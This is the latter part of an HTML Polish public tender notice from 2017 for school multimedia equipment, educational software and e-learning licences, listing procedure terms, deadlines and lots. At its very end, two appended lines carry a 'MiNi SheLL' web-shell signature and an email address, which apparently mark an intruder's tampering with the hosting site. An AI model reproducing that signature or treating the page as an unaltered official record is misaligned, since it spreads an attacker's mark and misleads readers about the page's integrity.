e)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi, potwierdzające, iż system zarządzania jakością Wykonawcy spełnia wymagania zawarte w normie serii PN-EN ISO 9001
f)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi, potwierdzające spełnienie wymagań systemów zarządzania ochroną środowiska, w szczególności certyfikat zgodności z normą PN-EN ISO 14001:2005 lub równoważną, 
9)	Urządzenie wielofunkcyjne  monochromatyczne 22
a)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi, potwierdzające, iż system zarządzania jakością Wykonawcy spełnia wymagania zawarte w normie serii PN-EN ISO 9001
b)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi, potwierdzające spełnienie wymagań systemów zarządzania ochroną środowiska, w szczególności certyfikat zgodności z normą PN-EN ISO 14001:2005 lub równoważną.
dla części 3 i 4
- karty katalogowe, lub specyfikacje techniczne albo opisy zawierające parametry i funkcjonalności ofertowanego przedmiotu zamówienia.
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">W terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji z otwarcia ofert, o której mowa w art. 86 ust. 5 ustawy, wykonawca zobowiązany będzie do przekazania zamawiającemu oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności, jeżeli w umowie nie przewidziano inaczej.
2. Istotne zmiany umowy, mogą dotyczyć:
1)	wynagrodzenia Wykonawcy w przypadku, o którym mowa w ust. 3 pkt. 6,
2)	wynagrodzenia Wykonawcy w przypadku, o którym mowa w ust. 3 pkt. 1, tylko jeżeli Wykonawca udowodni, że nowszy model (następca) jest droższy u producenta o ponad 10% niż model wycofany z produkcji, 
3)	warunków płatności,
4) terminu realizacji zamówienia,
5) poszczególnych elementów dostawy lub ich instalacji.
3. Zmiany, o których mowa w ust. 2 mogą być dokonane w przypadku:
1) przeszkód technicznych uniemożliwiających zastosowanie przyjętych w SIWZ lub ofercie rozwiązań, w szczególności wycofania danego urządzenia z produkcji i zastąpienia go modelem nowszym, 
2) wystąpienia zdarzeń losowych mających charakter siły wyższej, które uzasadniają wprowadzenie zmian do umowy, przez co rozumie się: akty terroru, wojny wypowiedziane i niewypowiedziane, blokady, powstania, zamieszki, epidemie, osunięcia gruntu, trzęsienia ziemi, powodzie, wybuchy i inne podobne nieprzewidywalne zdarzenia poza kontrolą którejkolwiek ze stron i którym żadna ze stron nie mogła zapobiec, 
3) przedłużających się procedur przetargowych i administracyjnych, mających wpływ na terminy umowne, opóźnienia Zamawiającego w podpisaniu umowy, 
4) niezawinionych przez wykonawcę opóźnień leżących po stronie producenta,
5) zmian w zakresie dofinansowania Projektu ze środków zewnętrznych,
6) ustawowej zmiany stawki podatku od towarów i usług (VAT),
4. Strona wnioskująca o zmianę umowy, przedkłada drugiej stronie pisemne uzasadnienie konieczności wprowadzenia zmian do umowy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 16/03/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              PL<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                tak
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>urządzenia multimedialne, wyposażenie i sprzęt komputerowy TIK<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>a) część 1  urządzenia multimedialne, wyposażenie i sprzęt komputerowy TIK
1)	mikroskop z kamerą i akumulatorem - 3 szt. 
2)	mikroskop z podłączeniem do komputera - 1 szt. 
3)	mikroskop optyczny - 2 szt. 
4)	teleskop - 2 szt. 
5)	urządzenie wielofunkcyjne wersja 1  3 szt. 
6)	urządzenie wielofunkcyjne wersja 2  1 szt. 
7)	tablety  84 szt. 
8)	laptopy z oprogramowaniem  5 szt. 
9)	rzutnik do ekranu z montażem  4 szt. 
10)	ekran projekcyjny z montażem  4 szt. 
11)	ekran projekcyjny ramowy  1 szt. 
12)	ekran wysuwany  1 szt. 
13)	tablica multimedialna z głośnikami oraz montażem  5 szt. 
14)	rzutnik do tablicy z uchwytem ściennym i montażem  4 szt. 
15)	 podłoga interaktywna do ćwiczeń, gier i zabaw ruchowych wraz z zestawem treści multimedialnych przeznaczonych do pracy z dziećmi w wieku szkolnym i przedszkolnym,  z montażem  1 szt. 
16)	aparat fotograficzny  4 szt. 
17)	aparat cyfrowy  14 szt. 
18)	monitor informacyjny z oprogramowaniem  3 szt. 
19)	laptop z pakietem biurowym  3 szt. 
20)	stacja dokująca- 2 szt. 
21)	monitor  2 szt. 
22)	urządzenie wielofunkcyjne	1 szt.
23)	mobilna pracownia językowa ze słuchawkami  1 kpl<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30200000-1, 38653400-1,
                    38651000-3,
                    32322000-6,
                    38000000-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 40<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>wydajność tabletu konwertowalnego</td><td>30</td></tr><tr><td>termin realizacji</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>termin realizacji liczony w dniach roboczych<br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>pakiety oprogramowania<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1)	oprogramowanie dla uczniów słabowidzących  1 szt.
2)	oprogramowanie graficzne  - licencja dla 16 osób - komplet pakietów  1 kpl.  
3)	zestawy oprogramowania multimedialnego do prowadzenia zajęć matematyczno-przyrodniczych i interdyscyplinarnych w gimnazjum:
a)	matematyka dla klasy 1 2 3 -  5 kpl
b)	fizyka dla klasy 1 2 3   3 kpl
c)	j. polski dla klasy 1 2 3  5 kpl
d)	geografia dla klasy 1 2 3  3 kpl
e)	chemia dla klasy 1 2 3  2 kpl
f)	biologia dla klasy 1 2 3 - 2 kpl
g)	historia dla klasy 1 2 3- 2 kpl
4) oprogramowanie multimedialne do prowadzenia zajęć matematyczno-przyrodniczych w szkole podstawowej:
a) angielski dla dzieci 5-8 lat - 2 kpl
b) angielski dla nastolatków   1 kpl
c) matematyka szkoła podstawowa -multimedialne materiały na tablice interaktywną i projektor -1 kpl
d) przyroda - szkoła podstawowa - multimedialne materiały na tablice interaktywną i projektor - 1 kpl
e) nauka programowania dla najmłodszych - gra edukacyjna ucząca programowania- 1 kpl
f) matematyka szkoła podstawowa -  zestaw 5 płyt CD - 1 kpl
g) alfabet angielski - program na tablicę interaktywną - 1 szt
h) Szkielet człowieka  program na tablice interaktywną - 1 szt.
i) edukacyjne gry o tematyce matematycznej - 1 kpl
j) program multimedialny stanowiący narzędzie do realizacji zajęć metodą projektów - 1 zestaw
k) aplikacja do nauki obsługi komputera w formie zabawy  zajęcia komputerowe  kl.3 SP  1 zestaw (90 dostępów)
l) aplikacja do nauki obsługi komputera w formie zabawy - zajęcia komputerowe kl.2 SP  1 zestaw (40 dostępów)
m) multimedialny program przybliżający tematykę podziału Polski na województwa- licencja na 20 stanowisk - 1 szt
n) edukacyjny program komputerowy dla dzieci od 7 do 12 lat, obrazujący eksperymenty z dziedziny fizyki i chemii - 1 szt.
o) wielostanowiskowy program komputerowy - pakiet do prowadzenia zajęć ukierunkowanych na rozwój pamięci oraz koncentracji uwagi dla dzieci od 5 lat do 9 lat - (15 stanowisk) - 2 kpl
p) multimedialny program do matematyki w szkole podstawowej - 1 kpl
r) multimedialny program do przyrody w szkole podstawowej - 1 kpl
s) interaktywna gra edukacyjna o tematyce przyrodniczej w dwóch częściach 1 kpl- 2 części
t) logiczna gra komputerowa - 1 szt
u) gra edukacyjna o tematyce matematycznej - 10 szt
w) interaktywny mówiący globus z aplikacją na tablet - 3 szt.
z) edukacyjne gry matematyczne - zestaw matematycznych gier edukacyjnych składających się z czterech części - 1 kpl
5) oprogramowanie zajęć wyrównujących szanse edukacyjne:
a) program do terapii pedagogicznej z matematyki  1 zestaw
b) program dla uczniów klas początkowych (6-9 lat), w wersji polskiej i angielskiej, 4 części, do wspomagania kompetencji poznawczych dzieci, pamięci i uwagi  1 zestaw,
6) oprogramowanie do prowadzenia zajęć dla uczniów ze specjalnymi potrzebami edukacyjnymi:
a) zestaw gier multimedialnych  1 komplet
7) pakiet edukacyjny dla najmłodszych dzieci korzystający z narzędzi myślowych TOC komplet  4 zestawy i 77 pakietów dla dzieci
8) oprogramowanie do tworzenia stron  internetowych  2 szt.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>48190000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 10<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>dostęp do platformy e-learningowej<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Dostawa licencji oprogramowania w chmurze do automatycznego weryfikowania i monitorowania procesu edukacji uczniów w szkołach podstawowych dla poziomów nauczania I, II, III, IV, V, VI oraz dla gimnazjów dla poziomu nauczania I, II, III, w postaci dostępu do aplikacji internetowej dla łącznie 1019 uczniów szkół podstawowych w Lublewie, Pręgowie, Bielkówku, Kolbudach i uczniów gimnazjum w Kolbudach w roku szkolnym 2016/2017 oraz  w roku szkolnym 2017/2018 wraz ze szkoleniem z obsługi tego oprogramowania dla  nauczycieli szkół podstawowych i gimnazjum<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>48190000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>wsparcie techniczne</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>dostęp do językowych platform e-learningowych<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1)	licencja na korzystanie z dostępu do platformy e-learning -  kurs online z j. angielskiego na tablety dla 60 dzieci w wieku 9 -12 lat, licencja na rok szkolny 2016/2017, 2017/2018
2)	licencja na korzystanie z dostępu do kursu języka angielskiego online na tablety dla 84 dzieci w wieku 6 -9 lat, licencja na rok szkolny 2016/2017, 2017/2018<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>48190000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 7<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>wsparcie techniczne</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com